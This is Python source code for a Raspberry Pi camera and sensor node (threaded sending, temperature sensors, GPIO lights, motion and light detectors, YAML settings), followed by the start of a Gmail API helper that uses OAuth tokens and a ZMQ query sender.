def shutdown_process_by_pid(self, pid):
os.kill(pid, signal.SIGTERM)
sys.exit()
def process_hub_reply(self, hub_reply):
""" Process hub reply if it is other than "OK".
A hub reply is normally "OK", but could be "send 10 images" or
"set resolution: (320, 240)". This method processes hub requests.
This may involve sending a requested image sequence, changing a setting,
or restarting the computer.
"""
# Typical response from hub is "OK" if there are no user or
# automated librian requests. Almost all responses are just "OK"
# therefore the default process_hub_reply is "pass"
# TODO Respond to hub repies if they are other than 'OK'
# for example, push "send 10 frames" request onto deque
# and then add "do requested extra frames" to detectors loop
# so that images get sent even though there is no routine reason
pass
def closeall(self, settings):
""" Close all resources, including cameras, lights, GPIO.
Parameters:
settings (Settings object): settings object created from YAML file
"""
for camera in self.camlist:
camera.cam.stop()
for light in self.lights:
light.turn_off()
if settings.sensors or settings.lights:
GPIO.cleanup()
if self.health.stall_p:
self.health.stall_p.terminate()
self.health.stall_p.join()
if settings.send_threading:
self.send_q.stop_sending()
self.sender.zmq_socket.setsockopt(zmq.LINGER, 0) # prevents ZMQ hang on exit
self.sender.close()
class SendQueue:
""" Implements a send_q replacement that uses threaded sends
The default send_q is a deque that is filled in a read_cameras forever loop
in the imagenode.py main() event loop. When the default send_q tests True
because it contains images to send, the send_frame loop empties the send_q.
It works, but has speed issues when sending occurs while motion detection is
actively occuring at the same time.
This class creates a drop-in replacement for send_q. This replacement
send_q will always return len(send_q) as 0 as if empty, so that the main()
event loop will loop forever in node.read_cameras() without ever sending
anything. This is implemented by providing _bool_ and __len__ methods to
prevent read_cameras from ever reaching the send_frame portion of the main
imagenode.py event loop.
This send_q replacement append() method will operate in read_cameras just as
the deque did, but has a send_messages_forever method in a separate
thread to send (message, image tuples) to empty the send_q. This
implementation of send_q allows the imagenode.py main program to remain
unchanged when send_threading is not set to True in the yaml settings.
Parameters:
maxlen (int): maximum length of send_q deque
send_frame (func): the ImageNode method that sends frames
process_hub_reply (func): the ImageNode method that processes hub replies
"""
def __init__(self, maxlen=500, send_frame=None, process_hub_reply=None):
self.send_q = deque(maxlen=maxlen)
self.send_frame = send_frame
self.process_hub_reply = process_hub_reply
self.keep_sending = True
def __bool__(self):
return False # so that the read loop keeps reading forever
def __len__(self):
return 0 # so that the main() send loop is never entered
def append(self, text_and_image):
self.send_q.append(text_and_image)
def send_messages_forever(self):
# this will run in a separate thread
# the "sleep()" calls allow main thread more time for image capture
while self.keep_sending:
if len(self.send_q) > 0: # send until send_q is empty
text, image = self.send_q.popleft()
sleep(0.0000001) # sleep before sending
hub_reply = self.send_frame(text, image)
self.process_hub_reply(hub_reply)
else:
sleep(0.0000001) # sleep before checking send_q again
def start(self):
# start the thread to read frames from the video stream
t = threading.Thread(target=self.send_messages_forever)
t.daemon = True
t.start()
def stop_sending(self):
self.keep_sending = False
sleep(0.0000001) # sleep to allow ZMQ to clear buffer
class Sensor:
""" Methods and attributes of a sensor, such as a temperature sensor
Each sensor is setup and started using the settings in the yaml file.
Includes methods for reading, and closing the sensor and GPIO pins.
Parameters:
sensor (text): dictionary key of current sensor being instantiated
sensors (dict): dictionary of all the sensors in the YAML file
settings (Settings object): settings object created from YAML file
"""
def __init__(self, sensor, sensors, settings, tiny_image, send_q):
""" Initializes a specific sensor using settings in the YAML file.
"""
self.tiny_image = tiny_image
self.send_q = send_q
if 'name' in sensors[sensor]:
self.name = sensors[sensor]['name']
else:
self.name = sensor
if 'gpio' in sensors[sensor]:
self.gpio = sensors[sensor]['gpio']
else:
self.gpio = 4 # GPIO pin 4 is default for testing
if 'type' in sensors[sensor]:
self.type = sensors[sensor]['type']
else:
self.type = 'Unknown'
if 'unit' in sensors[sensor]:
self.unit = sensors[sensor]['unit'].upper()
else:
self.unit = 'F'
if 'read_interval_minutes' in sensors[sensor]:
self.interval = sensors[sensor]['read_interval_minutes']
else:
self.interval = 10 # how often to read sensor in minutes
if 'min_difference' in sensors[sensor]:
self.min_difference = sensors[sensor]['min_difference']
else:
self.min_difference = 1 # minimum difference to count as reportable
self.interval *= 60.0 # convert often to check sensor to seconds
# self.event_text is the text message for this sensor that is
# sent when the sensor value changes
# example: Barn|Temperaure|85 F
# example: Barn|Humidity|42 %
# example: Garage|Temperature|71 F
# example: Compost|Moisture|95 %
# self.event_text will have self.current_reading appended when events are sent
# self.event_text = '|'.join([settings.nodename, self.name]).strip()
self.event_text = settings.nodename
# Initialize last_reading and temp_sensor variables
self.last_reading_temp = -999 # will ensure first temp reading is a change
self.last_reading_humidity = -999 # will ensure first humidity reading is a change
self.temp_sensor = None
# Sensor types
if self.type == 'DS18B20':
# note that DS18B20 requires GPIO pin 4 (unless kernel is modified)
global W1ThermSensor # for DS18B20 temperature sensor
from w1thermsensor import W1ThermSensor
self.temp_sensor = W1ThermSensor()
if (self.type == 'DHT11') or (self.type == 'DHT22'):
global adafruit_dht # for DHT11 & DHT22 temperature sensor
import adafruit_dht
if self.type == 'DHT11':
self.temp_sensor = adafruit_dht.DHT11(self.gpio)
if self.type == 'DHT22':
self.temp_sensor = adafruit_dht.DHT22(self.gpio)
if self.temp_sensor is not None:
self.check_temperature() # check one time, then start interval_timer
threading.Thread(daemon=True,
target=lambda: interval_timer(self.interval, self.check_temperature)).start()
def check_temperature(self):
""" adds temperature & humidity (if available) value from a sensor to senq_q message queue
"""
if self.type == 'DS18B20':
if self.unit == 'C':
temperature = int(self.temp_sensor.get_temperature(W1ThermSensor.DEGREES_C))
else:
temperature = int(self.temp_sensor.get_temperature(W1ThermSensor.DEGREES_F))
humidity = -999
if (self.type == 'DHT11') or (self.type == 'DHT22'):
for i in range(5): # try for valid readings 5 times; break if valid
try:
if self.unit == 'C':
temperature = self.temp_sensor.temperature
else:
temperature = self.temp_sensor.temperature * (9 / 5) + 32
temperature = float(format(temperature, '.1f'))
humidity = self.temp_sensor.humidity
humidity = float(format(humidity, '.1f'))
break # break out of for loop if got valid readings
except RuntimeError:
sleep(3) # wait 3 seconds and try again
pass # this will retry up to 5 times before exiting the for loop
if abs(temperature - self.last_reading_temp) >= self.min_difference:
# temperature has changed from last reported temperature, therefore
# send an event message reporting temperature by appending to send_q
temp_text = str(temperature) + " " + self.unit
text = '|'.join([self.event_text, 'Temp', temp_text])
text_and_image = (text, self.tiny_image)
self.send_q.append(text_and_image)
self.last_reading_temp = temperature
if abs(humidity - self.last_reading_humidity) >= self.min_difference:
# humidity has changed from last reported humidity, therefore
# send an event message reporting humidity by appending to send_q
humidity_text = str(humidity) + " %"
# Spelling of humidity all lower case is intentional to avoid
# first letter test of "Heartbeat" in imagehub
text = '|'.join([self.event_text, 'humidity', humidity_text])
text_and_image = (text, self.tiny_image)
self.send_q.append(text_and_image)
self.last_reading_humidity = humidity
class Light:
""" Methods and attributes of a light controlled by an RPi GPIO pin
Each light is setup and started using the settings in the yaml file.
Includes methods for turning the light on and off using the GPIO pins.
Parameters:
light (text): dictionary key of the current light being instantiated
lights (dict): dictionary of all the lights in the YAML file
settings (Settings object): settings object created from YAML file
"""
def __init__(self, light, lights, settings):
""" Initializes a specific light using settings in the YAML file.
"""
if 'name' in lights[light]:
self.name = lights[light]['name']
else:
self.name = light
if 'gpio' in lights[light]:
self.gpio = lights[light]['gpio']
else:
self.gpio = 18 # GPIO pin 18 is the default for testing
if 'on' in lights[light]:
self.on = lights[light]['on']
else:
self.on = 'continuous'
GPIO.setup(self.gpio, GPIO.OUT)
if self.on == 'continuous':
self.turn_on()
else: # set up light on/off cyclying other than continuous
pass # for example, during certain hours
def turn_on(self):
""" Turns on the light using the GPIO pins
"""
GPIO.output(self.gpio, True) # turn on light
def turn_off(self):
""" Turns off the light using the GPIO pins
"""
GPIO.output(self.gpio, False) # turn off light
class PiCameraUnthreadedStream():
""" Rreads the PiCamera without threading.
The PiVideoStream class within imutils.VideoStream provides a threaded way
to read the PiCamera images. This class provides a way to read the PiCamera
without threading, primarily intended for testing. For compatibility, the
method names are the same as imutils.VideoStream.
"""
def __init__(self, resolution=(320, 240), framerate=32, **kwargs):
from picamera.array import PiRGBArray
from picamera import PiCamera
self.camera = PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture,
format="bgr",
use_video_port=True)
self.frame = None
def read(self):
f = next(self.stream) # or f = self.stream.read()?
self.frame = f.array
self.rawCapture.truncate(0)
return self.frame
def stop(self):
self.close()
def close(self):
self.stream.close()
self.rawCapture.close()
self.camera.close()
class Camera:
""" Methods and attributes of a camera
Each camera is setup and started using the settings in the yaml file.
Includes setup of detectors, e.g., detector for motion
Parameters:
camera (text): dict key of current camera being instantiated
cameras (dict): dictionary of all cameras named in YAML file
settings (Settings object): settings object created from YAML file
"""
def __init__(self, camera, cameras, settings):
""" Initializes all the camera settings from settings in the YAML file.
"""
self.cam = None
self.jpeg_quality = 95 # 0 to 100, higher is better quality, 95 is cv2 default
# check picamera version
try:
picamversion = require('picamera')[0].version
except:
picamversion = '0'
if 'threaded_read' in cameras[camera]: # threaded on non-threaded camera reading
self.threaded_read = cameras[camera]['threaded_read']
else:
self.threaded_read = True
if 'resolution' in cameras[camera]:
self.resolution = literal_eval(cameras[camera]['resolution'])
else:
self.resolution = (320, 240)
if 'framerate' in cameras[camera]:
self.framerate = cameras[camera]['framerate']
else:
self.framerate = 32
if 'vflip' in cameras[camera]:
self.vflip = cameras[camera]['vflip']
else:
self.vflip = False
if 'resize_width' in cameras[camera]:
# resize_width is a percentage value
# width in pixels will be computed later after reading a test image
self.resize_width = cameras[camera]['resize_width']
else:
self.resize_width = None
if 'viewname' in cameras[camera]:
self.viewname = cameras[camera]['viewname']
else:
self.viewname = ' '
if 'src' in cameras[camera]:
self.src = cameras[camera]['src']
else:
self.src = 0
if 'exposure_mode' in cameras[camera]:
self.exposure_mode = cameras[camera]['exposure_mode']
else:
self.exposure_mode = None
if 'iso' in cameras[camera]:
self.iso = cameras[camera]['iso']
else:
self.iso = 0 # default value
if 'shutter_speed' in cameras[camera]:
self.shutter_speed = cameras[camera]['shutter_speed']
else:
self.shutter_speed = 0 # default value
if 'sharpness' in cameras[camera]:
self.sharpness = cameras[camera]['sharpness']
else:
self.sharpness = 0 # default value
if 'contrast' in cameras[camera]:
self.contrast = cameras[camera]['contrast']
else:
self.contrast = 0 # default value
if 'brightness' in cameras[camera]:
self.brightness = cameras[camera]['brightness']
else:
self.brightness = 50 # default value
if 'exposure_compensation' in cameras[camera]:
self.exposure_compensation = cameras[camera]['exposure_compensation']
else:
self.exposure_compensation = 0 # 0 default value, integer value between -25 and 25
if 'awb_mode' in cameras[camera]:
self.awb_mode = cameras[camera]['awb_mode']
else:
self.awb_mode = 'auto' # default value
self.detectors = []
if 'detectors' in cameras[camera]: # is there at least one detector
self.setup_detectors(cameras[camera]['detectors'],
settings.nodename,
self.viewname)
if camera[0].lower() == 'p': # this is a picam
# start PiCamera and warm up; inherits methods from
# imutils.VideoStream unless threaded_read is False; then uses class
# PiCameraUnthreadedStream to read the PiCamera in an unthreaded way
if self.threaded_read:
self.cam = VideoStream(usePiCamera=True,
resolution=self.resolution,
framerate=self.framerate).start()
else:
self.cam = PiCameraUnthreadedStream(resolution=self.resolution,
framerate=self.framerate)
# if an exposure mode has been set in yaml, set it
if self.exposure_mode:
self.cam.camera.exposure_mode = self.exposure_mode
# if an iso has been set in yaml, set it
if self.iso:
self.cam.camera.iso = self.iso
# if an iso has been set in yaml, set it
if self.shutter_speed:
self.cam.camera.shutter_speed = self.shutter_speed
# if an sharpness has been set in yaml, set it
if self.sharpness:
self.cam.camera.sharpness = self.sharpness
# if an contrast has been set in yaml, set it
if self.contrast:
self.cam.camera.contrast = self.contrast
# if an brightness has been set in yaml, set it
if self.brightness:
self.cam.camera.brightness = self.brightness
# if an exposure_compensation has been set in yaml, set it
if self.exposure_compensation:
self.cam.camera.exposure_compensation = self.exposure_compensation
# if an awb_mode has been set in yaml, set it
if self.awb_mode:
self.cam.camera.awb_mode = self.awb_mode
self.cam_type = 'PiCamera'
else: # this is a webcam (not a picam)
self.cam = VideoStream(src=0).start()
self.cam_type = 'webcam'
sleep(3.0) # allow camera sensor to warm up
# self.text is the text label for images from this camera.
# Each image that is sent is sent with a text label so the hub can
# file them by nodename, viewname, and send_type
# example: JeffOffice Window|jpg
# Nodename and View name are in one field, separated by a space.
# send_type is in the next field
# The 2 field names are separaged by the | character
node_and_view = ' '.join([settings.nodename, self.viewname]).strip()
self.text = '|'.join([node_and_view, settings.send_type])
# set up camera image queue
self.cam_q = deque(maxlen=settings.queuemax)
def setup_detectors(self, detectors, nodename, viewname):
""" Create a list of detectors for this camera
Parameters:
detectors (dict): detectors for this camera from YAML file
nodename (str): nodename to identify event messages and images sent
viewnane (str): viewname to identify event messages and images sent
"""
if isinstance(detectors, list):
for lst in detectors:
for detector in lst:
det = Detector(detector, lst, nodename, viewname) # create a Detector instance
self.detectors.append(det) # add to list of detectors for this camera
else:
for detector in detectors: # for each camera listed in yaml file
det = Detector(detector, detectors, nodename, viewname) # create a Detector instance
self.detectors.append(det) # add to list of detectors for this camera
class Detector:
""" Methods and attributes of a detector for motion, light, etc.
Each detector is setup with ROI tuples and various parameters.
Detector options that are common to all detectors are set up here.
Detector options that are specific to individual detector types (like
'light', are set up in detector specific sections here).
Parameters:
detector (text): dict key for a specific detector for this camera
detectors (dict): dictionary of all detectors for this camera
nodename (str): nodename to identify event messages and images sent
viewnane (str): viewname to identify event messages and images sent
"""
def __init__(self, detector, detectors, nodename, viewname):
""" Initializes all the detector using settings from the YAML file.
"""
self.detector_type = detector
# set detect_state function to detector_type (e.g., light or motion)
if detector == 'light':
self.detect_state = self.detect_light
if 'threshold' in detectors[detector]:
self.threshold = detectors[detector]['threshold']
else:
self.threshold = 100 # 100 is a default for testing
if 'min_frames' in detectors[detector]:
self.min_frames = detectors[detector]['min_frames']
else:
self.min_frames = 5 # 5 is default
# need to remember min_frames of state history to calculate state
self.state_history_q = deque(maxlen=self.min_frames)
elif detector == 'motion':
self.detect_state = self.detect_motion
self.moving_frames = 0
self.still_frames = 0
self.total_frames = 0
if 'delta_threshold' in detectors[detector]:
self.delta_threshold = detectors[detector]['delta_threshold']
else:
self.delta_threshold = 5 # 5 is a default for testing
if 'min_area' in detectors[detector]:
self.min_area = detectors[detector]['min_area']
else:
self.min_area = 3 # 3 is default percent of ROI
if 'min_motion_frames' in detectors[detector]:
self.min_motion_frames = detectors[detector]['min_motion_frames']
else:
self.min_motion_frames = 3 # 3 is default
if 'min_still_frames' in detectors[detector]:
self.min_still_frames = detectors[detector]['min_still_frames']
else:
self.min_still_frames = 3 # 3 is default
self.min_frames = max(self.min_motion_frames, self.min_still_frames)
if 'blur_kernel_size' in detectors[detector]:
self.blur_kernel_size = detectors[detector]['blur_kernel_size']
else:
self.blur_kernel_size = 15 # 15 is default blur_kernel_size
if 'print_still_frames' in detectors[detector]:
self.print_still_frames = detectors[detector]['print_still_frames']
else:
self.print_still_frames = True # True is default print_still_frames
if 'ROI' in detectors[detector]:
self.roi_pct = literal_eval(detectors[detector]['ROI'])
else:
self.roi_pct = ((0, 0), (100, 100))
if 'draw_roi' in detectors[detector]:
self.draw_roi = literal_eval(detectors[detector]['draw_roi'])
self.draw_color = self.draw_roi[0]
self.draw_line_width = self.draw_roi[1]
else:
self.draw_roi = None
# name of the ROI detector section
if 'roi_name' in detectors[detector]:
self.roi_name = detectors[detector]['roi_name']
else:
self.roi_name = ''
# include ROI name in log events
if 'log_roi_name' in detectors[detector]:
self.log_roi_name = detectors[detector]['log_roi_name']
else:
self.log_roi_name = False
# draw timestamp on image
if 'draw_time' in detectors[detector]:
self.draw_time = literal_eval(detectors[detector]['draw_time'])
self.draw_time_color = self.draw_time[0]
self.draw_time_width = self.draw_time[1]
if 'draw_time_org' in detectors[detector]:
self.draw_time_org = literal_eval(detectors[detector]['draw_time_org'])
else:
self.draw_time_org = (0, 0)
if 'draw_time_fontScale' in detectors[detector]:
self.draw_time_fontScale = detectors[detector]['draw_time_fontScale']
else:
self.draw_time_fontScale = 1
else:
self.draw_time = None
send_frames = 'None Set'
self.frame_count = 0
# send_frames option can be 'continuous', 'detected event', 'none'
if 'send_frames' in detectors[detector]:
send_frames = detectors[detector]['send_frames']
if not send_frames: # None was specified; send 0 frames
self.frame_count = 0
if 'detect' in send_frames:
self.frame_count = 10 # detected events default; adjusted later
elif 'continuous' in send_frames:
self.frame_count = -1 # send continuous flag
elif 'none' in send_frames: # don't send any frames
self.frame_count = 0
else:
self.frame_count = -1 # send continuous flag
# send_count option is an integer of how many frames to send if event
if 'send_count' in detectors[detector]:
self.send_count = detectors[detector]['send_count']
else:
self.send_count = 5 # default number of frames to send per event
# send_test_images option: if True, send test images like ROI, Gray
if 'send_test_images' in detectors[detector]:
self.send_test_images = detectors[detector]['send_test_images']
else:
self.send_test_images = False # default is NOT to send test images
# self.event_text is the text message for this detector that is
# sent when the detector state changes
# example: JeffOffice Window|light|dark
# example: JeffOffice Window|light|lighted
# self.event_text will have self.current_state appended when events are sent
node_and_view = ' '.join([nodename, viewname]).strip()
self.event_text = '|'.join([node_and_view, self.detector_type])
# An event is a change of state (e.g., 'dark' to 'lighted')
# Every detector is instantiated with all states = 'unknown'
self.current_state = 'unknown'
self.last_state = 'unknown'
self.msg_image = np.zeros((2, 2), dtype="uint8") # blank image tiny
if self.send_test_images:
# set the blank image wide enough to hold message of send_test_images
self.msg_image = np.zeros((5, 320), dtype="uint8") # blank image wide
def detect_state(self, camera, image, send_q):
""" Placeholder function will be set to specific detection function
For example, detect_state() will be set to detect_light() during
detector.__init__()
"""
print('Therefore, should never get to this print statement')
pass
def detect_light(self, camera, image, send_q):
""" Detect if ROI is 'lighted' or 'dark'; send event message and images
After adding current image to 'event state' history queue, detect if the
ROI state has changed (e.g., has state changed to 'lighted' from 'dark'.)
If the state has changed, send an event message and the event images.
(However, if send_frames option is 'continuous', images have already
been sent, so there is no need to send the event images.)
If state has not changed, just store the image state into 'event state'
history queue for later comparison and return.
Parameters:
camera (Camera object): current camera
image (OpenCV image): current image
send_q (Deque): where (text, image) tuples are appended to be sent
"""
# if we are sending images continuously, append current image to send_q
if self.frame_count == -1: # -1 code to send all frames continuously
text_and_image = (camera.text, image)
send_q.append(text_and_image)
# crop ROI & convert to grayscale
x1, y1 = self.top_left
x2, y2 = self.bottom_right
ROI = image[y1:y2, x1:x2]
gray = cv2.cvtColor(ROI, cv2.COLOR_BGR2GRAY)
# calculate current_state of ROI
gray_mean = int(np.mean(gray))
if gray_mean > self.threshold:
state = 'lighted'
state_num = 1
else:
state = 'dark'
state_num = -1
if self.send_test_images:
images = []
images.append(('ROI', ROI,))
images.append(('Grayscale', gray,))
state_values = []
state_values.append(('State', state,))
state_values.append(('Mean Pixel Value', str(gray_mean),))
self.send_test_data(images, state_values, send_q)
self.state_history_q.append(state_num)
if len(self.state_history_q) < self.min_frames:
return # not enough history to check for a state change
# have enough history now, so...
# determine if there has been a change in state
if self.state_history_q.count(-1) == self.min_frames:
self.current_state = 'dark'
elif self.state_history_q.count(1) == self.min_frames:
self.current_state = 'lighted'
else:
return # state has not stayed the same for self.min_frames
if self.current_state == self.last_state:
return # there has been no state change and hence no event yet
# state has changed from last reported state, therefore
# send event message, reporting current_state, by appending it to send_q
text = '|'.join([self.event_text, self.current_state])
if self.log_roi_name:
text = '|'.join([text, self.roi_name])
text_and_image = (text, self.msg_image)
send_q.append(text_and_image)
# if frame_count = -1, then already sending images continuously...
# so no need to send the images of this detected event
# if frame_count > 0, need to send send_count images from the cam_q
# by appending them to send_q
if self.frame_count > 0: # then need to send images of this event
send_count = min(len(camera.cam_q), self.send_count)
for i in range(-send_count, -1):
text_and_image = (camera.text, camera.cam_q[i])
send_q.append(text_and_image)
# Now that current state has been sent, it becomes the last_state
self.last_state = self.current_state
def detect_motion(self, camera, image, send_q):
""" Detect if ROI is 'moving' or 'still'; send event message and images
After adding current image to 'event state' history queue, detect if the
ROI state has changed (e.g., has state changed to 'moving' from 'still'.)
If the state has changed, send an event message and the event images.
(However, if send_frames option is 'continuous', images have already
been sent, so there is no need to send the event images.)
If state has not changed, just store the image into 'event state'
history queue for later comparison and return.
Parameters:
camera (Camera object): current camera
image (OpenCV image): current image
send_q (Deque): where (text, image) tuples are appended to be sent
This function borrowed a lot from a motion detector tutorial post by
<NAME> on PyImageSearch.com. See README.rst for details.
"""
#####
# Branch to fix duplicate frames; see GitHub issues #15 ()
#####
# if we are sending images continuously, append current image to send_q
if self.frame_count == -1: # -1 code ==> send all frames continuously
text_and_image = (camera.text, image)
send_q.append(text_and_image) # send current image
# crop ROI & convert to grayscale & apply GaussianBlur
x1, y1 = self.top_left
x2, y2 = self.bottom_right
ROI = image[y1:y2, x1:x2]
gray = cv2.cvtColor(ROI, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray,
(self.blur_kernel_size, self.blur_kernel_size),
0)
# If no history yet, save the first image as the average image
if self.total_frames < 1:
self.average = gray.copy().astype('float')
else:
# add gray image to weighted average image
cv2.accumulateWeighted(gray, self.average, 0.5)
# frame delta is the absolute difference between gray and self.average
frameDelta = cv2.absdiff(gray, cv2.convertScaleAbs(self.average))
# threshold the frame delta image and dilate the thresholded image
thresholded = cv2.threshold(frameDelta, self.delta_threshold,
255, cv2.THRESH_BINARY)[1]
thresholded = cv2.dilate(thresholded, None, iterations=2)
# find contours in thresholded image
# OpenCV version 3.x returns a 3 value tuple
# OpenCV version 4.x returns a 2 value tuple
contours_tuple = cv2.findContours(thresholded.copy(),
cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
contours = contours_tuple[-2] # captures contours value correctly for both versions of OpenCV
state = 'still'
area = 0
for contour in contours:
area = cv2.contourArea(contour)
if area < self.min_area_pixels:
continue
state = 'moving'
if state == 'moving':
self.moving_frames += 1
else:
self.moving_frames = 0
self.still_frames += 1
# Optionally, send various test images to visually tune settings
if self.send_test_images: # send some intermediate test images
images = []
images.append(('ROI', ROI,))
images.append(('Grayscale', gray,))
images.append(('frameDelta', frameDelta,))
images.append(('thresholded', thresholded,))
state_values = []
state_values.append(('State', self.current_state,))
state_values.append(('N Contours', str(len(contours)),))
state_values.append(('Area', str(area),))
self.send_test_data(images, state_values, send_q)
else:
sleep(0.02) # for testing
pass
self.total_frames += 1
if self.total_frames < self.min_frames:
return # not enough history to check for a state change
# have enough history now, so...
# determine if there has been a change in state
if self.moving_frames >= self.min_motion_frames:
self.current_state = 'moving'
self.still_frames = 0
elif self.still_frames >= self.min_still_frames:
self.current_state = 'still'
else:
return # not enought frames of either state; return for more
if self.current_state == self.last_state:
return # there has been no state change and hence no event yet
# state has changed from last reported state, so...
# send event message reporting current_state by appending it to send_q
text = '|'.join([self.event_text, self.current_state])
if self.log_roi_name:
text = '|'.join([text, self.roi_name])
text_and_image = (text, self.msg_image)
send_q.append(text_and_image)
# if frame_count = -1, then already sending images continuously...
# so no need to send the images of this detected event
# if frame_count > 0, need to send send_count images from the cam_q
# by appending them to send_q
if self.frame_count > 0: # then need to send images of this event
send_count = min(len(camera.cam_q), self.send_count)
if (self.current_state == 'still') and (self.print_still_frames is False):
send_count = 0
for i in range(-send_count, -1):
text_and_image = (camera.text, camera.cam_q[i])
send_q.append(text_and_image)
# Now that current state has been sent, it becomes the last_state
self.last_state = self.current_state
def send_test_data(self, images, state_values, send_q):
""" Sends various test data, images, computed state values via send_q
Used for testing, this function takes a set of images and computed
values such as number of contours, averge light intensity value,
and computed state, such as "moving" and "still" and puts these values
into small images that can be displayed in a simple test hub for
tuning the settings parameters of a detector.
Parameters:
images (list): test images to send for display, e.g., ROI, grayscale
state_values (list): the name and value of tuning parameters, such
as state, area, N_contours, Mean Pixel Value, etc.
"""
for text_and_image in images:
send_q.append(text_and_image)
font = cv2.FONT_HERSHEY_SIMPLEX
for text_and_value in state_values:
text, value = text_and_value
state_image = np.zeros((50, 200), dtype="uint8") # blank image
cv2.putText(state_image, value, (10, 35), font,
1, (255, 255, 255), 2, cv2.LINE_AA)
text_and_image = (text, state_image)
send_q.append(text_and_image)
class Settings:
"""Load settings from YAML file
Note that there is currently almost NO error checking for the YAML
settings file. Therefore, by design, an exception will be raised
when a required setting is missing or misspelled in the YAML file.
This stops the program with a Traceback which will indicate which
setting below caused the error. Reading the Traceback will indicate
which line below caused the error. Fix the YAML file and rerun the
program until the YAML settings file is read correctly.
There is a "print_settings" option that can be set to TRUE to print
the dictionary that results from reading the YAML file. Note that the
order of the items in the dictionary will not necessarily be the order
of the items in the YAML file (this is a property of Python dictionaries).
"""
def __init__(self):
userdir = os.path.expanduser("~")
with open(os.path.join(userdir, "imagenode.yaml")) as f:
self.config = yaml.safe_load(f)
self.print_node = False
if 'node' in self.config:
if 'print_settings' in self.config['node']:
if self.config['node']['print_settings']:
self.print_settings()
self.print_node = True
else:
self.print_node = False
else:
self.print_settings('"node" is a required settings section but not present.')
raise KeyboardInterrupt
if 'hub_address' in self.config:
self.hub_address = self.config['hub_address']['H1']
# TODO add read and store H2 and H3 hub addresses
else:
self.print_settings('"hub_address" is a required settings section but not present.')
raise KeyboardInterrupt
if 'name' in self.config['node']:
self.nodename = self.config['node']['name']
else:
self.print_settings('"name" is a required setting in the "node" section but not present.')
raise KeyboardInterrupt
if 'patience' in self.config['node']:
self.patience = self.config['node']['patience']
else:
self.patience = 10 # default is to wait 10 seconds for hub reply
if 'queuemax' in self.config['node']:
self.queuemax = self.config['node']['queuemax']
else:
self.queuemax = 50
if 'heartbeat' in self.config['node']:
self.heartbeat = self.config['node']['heartbeat']
else:
self.heartbeat = None
if 'stall_watcher' in self.config['node']:
self.stall_watcher = self.config['node']['stall_watcher']
else:
self.stall_watcher = False
if 'REP_watcher' in self.config['node']:
self.REP_watcher = self.config['node']['REP_watcher']
else:
self.REP_watcher = True
if 'send_threading' in self.config['node']:
self.send_threading = self.config['node']['send_threading']
else:
self.send_threading = False
if 'send_type' in self.config['node']:
self.send_type = self.config['node']['send_type']
else:
self.send_type = 'jpg' # default send type is jpg
if 'cameras' in self.config:
self.cameras = self.config['cameras']
else:
self.cameras = None
if 'sensors' in self.config:
self.sensors = self.config['sensors']
else:
self.sensors = None
if 'lights' in self.config:
self.lights = self.config['lights']
else:
self.lights = None
def print_settings(self, title=None):
""" prints the settings in the yaml file using pprint()
"""
if title:
print(title)
print('Contents of imagenode.yaml:')
pprint.pprint(self.config)
print()
```
|
{
"source": "jeffbass/yin-yang-ranch",
"score": 3
}
|
#### File: helpers/comms/gmail.py
```python
import os
import csv
import sys
import base64
import pprint
import pickle # used for storing / reading back credentials
import logging
from time import sleep
from pathlib import Path
from datetime import datetime
from collections import namedtuple
from helpers.utils import Patience
from multiprocessing import Process
from email.mime.text import MIMEText
from imagezmq import ImageHub, ImageSender
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
log = logging.getLogger(__name__)
class QuerySender(ImageSender):
def __init__(self, connect_to='tcp://*:5555', REQ_REP = True):
ImageSender.__init__(self, connect_to=connect_to, REQ_REP = REQ_REP)
def send_query(self, query, buf=b'0'):
reply_b = self.send_jpg(query, buf) # send_jpg returns a bytestring
return reply_b # just 'OK' for gmail comm channel; don't need to use it
class Gmail:
""" Initialize gmail API, read and write messages
Sets up the Gmail service. Starts a Process() to watch Gmail for new
messages and send the ones that are queries to Librarian via ZMQ. Provides
a method to send replies back to Gmail service.
Parameters:
settings (str): settings & options from libarian.yaml.
details (dict): channel options & details specificed for Gmail channel
"""
def __init__(self, settings, details, use_q_s=True):
# pprint.pprint(details)
gmail_dir = settings.lib_dir / Path('gmail') # gmail directory
token = Path("token1.pickle") # token1 when use_q_s=False
self.token_file = str(gmail_dir / token)
creds = Path("credentials.json")
self.credentials_file = str(gmail_dir / creds)
# Use QuerySender if this instance of Gmail is sending messages via ZMQ
# Also use alternate directory and files for Gmail creds files
if use_q_s: # set up QuerySender to send messages via ZMQ
self.port = details.get('port', 5559) # gmail ZMQ port
self.address = 'tcp://127.0.0.1:' + str(self.port).strip()
# print('Self address:', self.address)
self.q_s = QuerySender(connect_to=self.address)
gmail_dir = settings.lib_dir / Path('gmail2') # gmail directory
token = Path("token2.pickle") # token2 when use_q_s=True
self.token_file = str(gmail_dir / token)
creds = Path("credentials.json")
self.credentials_file = str(gmail_dir / creds)
contacts = self.get_contacts(gmail_dir, details)
self.phones_OK_list = [contact.mobile_phone for contact in contacts]
self.emails_OK_list = [contact.email for contact in contacts]
self.mail_check_seconds = details.get('mail_check_seconds', 5)
self.patience = settings.patience
self.gmail, self.historyId = self.gmail_start_service()
def gmail_start_service(self):
""" gmail_start_service -- start the gmail service using credentials
Starts the gmail service using the 2 credential files (json and token).
See Gmail API docs and quickstart.py for details. Reads a message to
obtain a current historyId; used by gmail_monitor to watch
for changes in the gmail mailbox; polling mailbox history is much
cheaper in "points" than polling for new messages themselves.
Returns:
gmail: the Gmail service object with read, send, etc. methods.
historyId: a current historyId
"""
creds = self.get_credentials()
# initialize gmail service
gmail = build('gmail', 'v1', credentials=creds, cache_discovery=False)
# get list of messages: first step in getting a historyId
results = gmail.users().messages().list(userId='me',
maxResults=10,includeSpamTrash=False).execute()
num_msgs = results.get('resultSizeEstimate', -1)
messages = results.get('messages', [])
if not messages:
latestMessageId = None
else:
# get the first message in the list which should be the latest
latestMessageId = messages[3].get('id', None)
latestMessageThreadId = messages[3].get('threadId', None)
# print('Latest Message Id and Thread Id:')
# print(latestMessageId, latestMessageThreadId)
# print('Number of messages Estimate: ', num_msgs)
# print('Number of messages in message list: ', len(messages))
if not messages:
pass
# print('No messages retrieved')
else:
pass
# print()
# print('Received', len(messages), ' messages.')
# print('list of messages:')
